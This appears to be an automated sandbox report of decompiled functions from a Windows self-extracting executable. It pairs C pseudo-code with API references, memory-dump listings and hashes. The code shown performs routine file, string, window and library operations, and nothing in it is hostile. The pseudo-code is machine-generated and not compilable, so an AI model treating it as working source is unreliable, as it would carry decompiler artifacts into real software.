								asm("sbb eax, eax");
								_t101 = E00188518(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00191A30();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E0018A72C(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00188518(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00191A30();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x0018a05d
0x0018a05e
0x0018a05f
0x0018a066
0x0018a06a
0x0018a06b
0x0018a071
0x0018a077
0x0018a07d
0x0018a080
0x0018a080
0x0018a083
0x0018a085
0x0018a085
0x0018a083
0x0018a087
0x0018a08c
0x0018a093
0x0018a096
0x0018a096
0x0018a0b2
0x0018a0b8
0x0018a0bd
0x0018a250
0x0018a263
0x0018a0c3
0x0018a0c3
0x0018a0c6
0x0018a0cb
0x0018a0cf
0x0018a123
0x0018a123
0x0018a125
0x0018a127
0x0018a245
0x0018a245
0x0018a247
0x0018a248
0x00000000
0x0018a24e
0x0018a138
0x0018a13e
0x0018a140
0x00000000
0x00000000
0x0018a146
0x0018a158
0x0018a15d
0x0018a161
0x00000000
0x00000000
0x0018a16e
0x0018a1a8
0x0018a1ab
0x0018a1ae
0x0018a1b0
0x0018a1b2
0x0018a1b4
0x0018a200
0x0018a200
0x0018a202
0x0018a202
0x0018a204
0x0018a23e
0x0018a23f
0x00000000
0x0018a244
0x0018a218
0x0018a21d
0x0018a21f
0x00000000
0x00000000
0x0018a223
0x0018a224
0x0018a225
0x0018a228
0x0018a264
0x0018a267
0x0018a22a
0x0018a22a
0x0018a22b
0x0018a22b
0x0018a238
0x0018a23a
0x0018a23c
0x0018a26d
0x00000000
0x00000000
0x00000000
0x00000000
0x0018a23c
0x0018a1b6
0x0018a1b9
0x0018a1bb
0x0018a1bd
0x0018a1bf
0x0018a1c2
0x0018a1c7
0x0018a1e2
0x0018a1e4
0x0018a1ee
0x0018a1f0
0x0018a1f1
0x0018a1f3
0x00000000
0x00000000
0x0018a1f5
0x0018a1fb
0x0018a1fb
0x00000000
0x0018a1fb
0x0018a1c9
0x0018a1cb
0x0018a1cf
0x0018a1d4
0x0018a1d6
0x0018a1d8
0x00000000
0x00000000
0x0018a1da
0x00000000
0x0018a1da
0x0018a170
0x0018a175
0x00000000
0x00000000
0x0018a17b
0x0018a17d
0x00000000
0x00000000
0x0018a194
0x0018a199
0x0018a19d
0x00000000
0x00000000
0x00000000
0x0018a1a3
0x0018a0d6
0x0018a0d8
0x0018a0da
0x0018a0e2
0x0018a101
0x0018a103
0x0018a10d
0x0018a10f
0x0018a110
0x0018a112
0x00000000
0x00000000
0x0018a118
0x0018a11e
0x0018a11e
0x00000000
0x0018a11e
0x0018a0e6
0x0018a0ea
0x0018a0ef
0x0018a0f3
0x00000000
0x00000000
0x0018a0f9
0x00000000
0x0018a0f9

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00184E35,00184E35,?,?,?,0018A2A9,00000001,00000001,3FE85006), ref: 0018A0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0018A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0018A138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0018A232
__freea.LIBCMT ref: 0018A23F

Part of subcall function 00188518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0018C13D,00000000,?,001867E2,?,00000008,?,001889AD,?,?,?), ref: 0018854A

__freea.LIBCMT ref: 0018A248
__freea.LIBCMT ref: 0018A26D

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: f7f9b2e2274b93de5b8e197b3ee8c8d8bcdf53251ac2b01e03e21ad1f9ddbc67
Instruction ID: f65dd99b2599b780dc72eb53e57fd1dda42a51f1011fbe8bb70afb9b57c44cad
Opcode Fuzzy Hash: f7f9b2e2274b93de5b8e197b3ee8c8d8bcdf53251ac2b01e03e21ad1f9ddbc67
Instruction Fuzzy Hash: D251D372600206AFFB35AE64CC81EBB77AAEF50750F95422AFC04D6140EB35DE408B61

Uniqueness

Uniqueness Score: -1.00%

Function 0017A2C7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0017A2C7(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E001717AC( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}

0x0017a2d7
0x0017a2de
0x0017a2e6
0x0017a2e9
0x0017a2f6
0x0017a2fd
0x0017a305
0x0017a30b
0x0017a30b
0x0017a30d
0x0017a310
0x0017a315
0x00000000
0x0017a315
0x0017a31f

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0017A2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 0017A315

Part of subcall function 001717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0016BB05,00000000,.exe,?,?,00000800,?,?,001785DF,?), ref: 001717C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0017A305

Strings

plWv, xrefs: 0017A315
EDIT, xrefs: 0017A2E9, 0017A2F4, 0017A301

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT$plWv
API String ID: 4243998846-3413696572
Opcode ID: 9e897a7d985295b855b592c1af4728a1b6c086c683118feda048a9b39cebdd56
Instruction ID: bf9946e5c1c8559799207d9440c58b2697cdf8bbdaae9e4defdfcc3b5fdee8a8
Opcode Fuzzy Hash: 9e897a7d985295b855b592c1af4728a1b6c086c683118feda048a9b39cebdd56
Instruction Fuzzy Hash: CBF08232A4122877E7209A649C05F9F777CAF86B10F444156FD49A2180D770E991C6F6

Uniqueness

Uniqueness Score: -1.00%

Function 001699B0, Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E001699B0(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t49;
				long _t60;
				unsigned int _t62;
				long _t65;
				signed int _t66;
				char _t69;
				void* _t73;
				void* _t75;
				long _t79;
				void* _t82;

				_t75 = __esi;
				E0017E360();
				_t62 = _a4188;
				_t73 = __ecx;
				 *(__ecx + 0x1024) =  *(__ecx + 0x1024) & 0x00000000;
				if( *((char*)(__ecx + 0x22)) != 0 || (_t62 & 0x00000004) != 0) {
					_t69 = 1;
				} else {
					_t69 = 0;
				}
				_push(_t75);
				asm("sbb esi, esi");
				_t79 = ( ~(_t62 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t62 & 0x00000001) != 0) {
					_t79 = _t79 | 0x40000000;
				}
				_t65 =  !(_t62 >> 3) & 0x00000001;
				if(_t69 != 0) {
					_t65 = _t65 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t73 + 0x1b)) != 0x00000000) - 0x00000001 & 0x08000000;
				E001670BF( &_a12);
				if( *((char*)(_t73 + 0x20)) != 0) {
					_t79 = _t79 | 0x00000100;
				}
				_t49 = CreateFileW(_a4184, _t79, _t65, 0, 3, _v0, 0); // executed
				_t82 = _t49;
				if(_t82 != 0xffffffff) {
					L17:
					if( *((char*)(_t73 + 0x20)) != 0 && _t82 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t82, 0,  &_a4, 0);
					}
					 *((char*)(_t73 + 0x18)) = 0;
					_t66 = _t65 & 0xffffff00 | _t82 != 0xffffffff;
					 *((intOrPtr*)(_t73 + 0xc)) = 0;
					 *((char*)(_t73 + 0x10)) = 0;
					if(_t82 != 0xffffffff) {
						 *(_t73 + 4) = _t82;
						E0016FE56(_t73 + 0x24, _a4184, 0x800);
						 *((char*)(_t73 + 0x21)) = 0;
					}
					return _t66;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E0016B66C(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t73 + 0x1024)) = 1;
						}
						goto L17;
					}
					_t82 = CreateFileW( &_a12, _t79, _t65, 0, 3, _v0, 0);
					_t60 = GetLastError();
					if(_t60 == 2) {
						_a4.dwLowDateTime = _t60;
					}
					if(_t82 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}

0x001699b0
0x001699b5
0x001699bb
0x001699c4
0x001699c6
0x001699d1
0x001699dc
0x001699d8
0x001699d8
0x001699d8
0x001699e2
0x001699ea
0x001699f2
0x001699fb
0x001699fd
0x001699fd
0x00169a08
0x00169a0d
0x00169a0f
0x00169a0f
0x00169a24
0x00169a28
0x00169a31
0x00169a33
0x00169a33
0x00169a4c
0x00169a52
0x00169a57
0x00169abb
0x00169ac0
0x00169ac7
0x00169ad0
0x00169adb
0x00169adb
0x00169ae6
0x00169ae9
0x00169aec
0x00169aef
0x00169af5
0x00169b06
0x00169b0a
0x00169b0f
0x00169b0f
0x00169b1e
0x00169a59
0x00169a5f
0x00169a7b
0x00169aaa
0x00169aaf
0x00169ab1
0x00169ab1
0x00000000
0x00169aaf
0x00169a94
0x00169a96
0x00169a9f
0x00169aa1
0x00169aa1
0x00169aa8
0x00000000
0x00000000
0x00000000
0x00000000
0x00169aa8

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,001678AD,?,00000005,?,00000011), ref: 00169A4C
GetLastError.KERNEL32(?,?,001678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00169A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,001678AD,?,00000005,?), ref: 00169A8E
GetLastError.KERNEL32(?,?,001678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00169A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00169ADB

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: e558e77ac0311bcf24a8c3867af11bc6c193e2f41e8c63e3730123b3f8a35940
Instruction ID: c1646f5cf7a05644a9d032fe6e727f0ffa94a6af3b06478c62a96708bf49ea3c
Opcode Fuzzy Hash: e558e77ac0311bcf24a8c3867af11bc6c193e2f41e8c63e3730123b3f8a35940
Instruction Fuzzy Hash: E64176315447466FE7208F60CC45BEABBD8BB01324F10071AF9E4971D0E7B5A9A8CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0018B610, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0018B610() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t8;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0018B5D9(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E00188518(_t19, _t7); // executed
						_t25 = _t8;
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E001884DE(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x0018b61f
0x0018b625
0x0018b67d
0x0018b67d
0x0018b627
0x0018b628
0x0018b62d
0x0018b636
0x0018b63c
0x0018b642
0x0018b647
0x00000000
0x0018b649
0x0018b64a
0x0018b64f
0x0018b654
0x0018b672
0x0018b66c
0x0018b66c
0x0018b66e
0x0018b66e
0x0018b675
0x0018b67a
0x0018b647
0x0018b681
0x0018b684
0x0018b684
0x0018b692

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0018B619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0018B63C

Part of subcall function 00188518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0018C13D,00000000,?,001867E2,?,00000008,?,001889AD,?,?,?), ref: 0018854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0018B662
_free.LIBCMT ref: 0018B675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0018B684

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: d603f35998547b6afc17999a053e04e671f0b72c379708b5f20bfeda92610960
Instruction ID: 6f0728f94a19982ee62b7ac0329135fd3942d9f0027b6b80ce49a9f5a043184e
Opcode Fuzzy Hash: d603f35998547b6afc17999a053e04e671f0b72c379708b5f20bfeda92610960
Instruction Fuzzy Hash: 02017562605615BB632126B65CC8C7B6A6DDFC6BA03250229B914C2110FF608F019AB4

Uniqueness

Uniqueness Score: -1.00%

Function 0017AC74, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0017AC74() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0x1a8458; // 0x502be
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32);
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}

0x0017ac85
0x0017ac8d
0x0017ac96
0x0017ac9c
0x0017aca3
0x0017acb4
0x0017acb8
0x0017acc2
0x00000000
0x0017acc2
0x0017acaa
0x0017acb2
0x00000000
0x00000000
0x0017acb2
0x0017accc

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0017AC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0017AC96
IsDialogMessageW.USER32(000502BE,?), ref: 0017ACAA
TranslateMessage.USER32(?), ref: 0017ACB8
DispatchMessageW.USER32(?), ref: 0017ACC2

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 5c45ac1aa6707c1f447acca3a5090cba1772868174b173beda6feac98e77a932
Instruction ID: b34d6ff58254bc5f58bc628f77c7ff6b8662bfd79b9519748c15118e93393407
Opcode Fuzzy Hash: 5c45ac1aa6707c1f447acca3a5090cba1772868174b173beda6feac98e77a932
Instruction Fuzzy Hash: E6F0BD71901229AB8B209BE59C4CEEF7F7CEF052517408516F519D2510EB34D555C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0017A335, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0017A335(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00170085(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0x1c217c(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0x1c2034( &_v16);
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L0017E23E(); // executed
				 *0x1c2088(0x1a8430,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}

0x0017a344
0x0017a34b
0x0017a34e
0x0017a357
0x0017a35f
0x0017a366
0x0017a370
0x0017a37b
0x0017a37f
0x0017a382
0x0017a385
0x0017a38f
0x0017a39c

APIs

Part of subcall function 00170085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001700A0
Part of subcall function 00170085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0016EB86,Crypt32.dll,00000000,0016EC0A,?,?,0016EBEC,?,?,?), ref: 001700C2

OleInitialize.OLE32(00000000), ref: 0017A34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0017A385
SHGetMalloc.SHELL32(001A8430), ref: 0017A38F

Strings

riched20.dll, xrefs: 0017A33D

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: a4bd172ab1d61b185ebf536401d21a3bad8cbf5ed963ec32a0a17441de77887b
Instruction ID: 236892c812c32403a4efaf511a67f315210175c585b3ae2ced6b7f96471273e4
Opcode Fuzzy Hash: a4bd172ab1d61b185ebf536401d21a3bad8cbf5ed963ec32a0a17441de77887b
Instruction Fuzzy Hash: A8F0F9B5D00209ABCB10AF99D8499EFFFFCEF99711F00415AF814E2241DBB456458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0017D287, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0017D287(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E0017E360();
				SetEnvironmentVariableW(L"sfxcmd", _a4);
				_t7 = E0016FBD8(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E0016FCF1() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
				}
				return _t7;
			}

0x0017d287
0x0017d28f
0x0017d29d
0x0017d2b2
0x0017d2b7
0x0017d2bb
0x0017d2c0
0x0017d2ca
0x0017d2c3
0x0017d2c3
0x0017d2c9
0x0017d2c9
0x0017d2d9
0x0017d2d9
0x0017d2e3

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0017D29D
SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0017D2D9

Strings

sfxcmd, xrefs: 0017D298
sfxpar, xrefs: 0017D2D4

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 2330b0a6e4a77fbf1f30561ba04af9abddf122bd0bde8093678da475b8f6584c
Instruction ID: f2e55976f38eb91fbed8951091533bf28dcb16998fc83f0d20a3f7dd9d3590e2
Opcode Fuzzy Hash: 2330b0a6e4a77fbf1f30561ba04af9abddf122bd0bde8093678da475b8f6584c
Instruction Fuzzy Hash: 0AF0A77280122CA6CB212FD4AC09EBA77B9AF19741B044566FC4C66152D761CD91D7F1

Uniqueness

Uniqueness Score: -1.00%

Function 0016984E, Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0016984E(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00169989(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E0016984E(_t25);
						}
					}
				}
				return _t15;
			}

0x00169851
0x00169853
0x0016985a
0x00169864
0x00169864
0x00169876
0x0016987e
0x001698da
0x00169880
0x00169882
0x00169889
0x001698a2
0x001698a6
0x001698b7
0x001698bb
0x001698d5
0x001698d5
0x001698c7
0x001698c7
0x001698d0
0x00000000
0x001698d2
0x001698d2
0x00000000
0x001698d2
0x001698d0
0x001698a8
0x001698a8
0x001698b1
0x00000000
0x001698b3
0x001698b3
0x001698b3
0x001698b1
0x0016988b
0x0016988b
0x00169893
0x00000000
0x00169895
0x00169895
0x00169896
0x00169896
0x0016989b
0x0016989b
0x00169893
0x00169889
0x001698e2

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0016985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00169876
GetLastError.KERNEL32 ref: 001698A8
GetLastError.KERNEL32 ref: 001698C7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 2161958c0d41690853af520e9c35d8ab94a207ccd95e4d4b660744f60bd86dfd
Instruction ID: a10c3ef2505695b64eedf90629a165ebef0d7b242b85e6346ec98c951a6ee97e
Opcode Fuzzy Hash: 2161958c0d41690853af520e9c35d8ab94a207ccd95e4d4b660744f60bd86dfd
Instruction Fuzzy Hash: 08118E3190021CEBDB209B51CC04A7977ACFB16771F14852AF86AC7990D7359E649F51

Uniqueness

Uniqueness Score: -1.00%

Function 0018A4F4, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0018A4F4(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x1c15e0 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x196e90 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xd6971697
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x0018a4f9
0x0018a4fd
0x0018a504
0x0018a508
0x0018a516
0x0018a526
0x0018a52c
0x0018a530
0x0018a559
0x0018a55b
0x0018a55f
0x0018a562
0x0018a562
0x0018a568
0x0018a56a
0x00000000
0x0018a56b
0x0018a532
0x0018a53b
0x0018a54a
0x0018a53d
0x0018a540
0x0018a546
0x0018a546
0x0018a54e
0x00000000
0x0018a550
0x0018a553
0x0018a555
0x00000000
0x0018a555
0x0018a54e
0x0018a50a
0x0018a50f
0x00000000

APIs

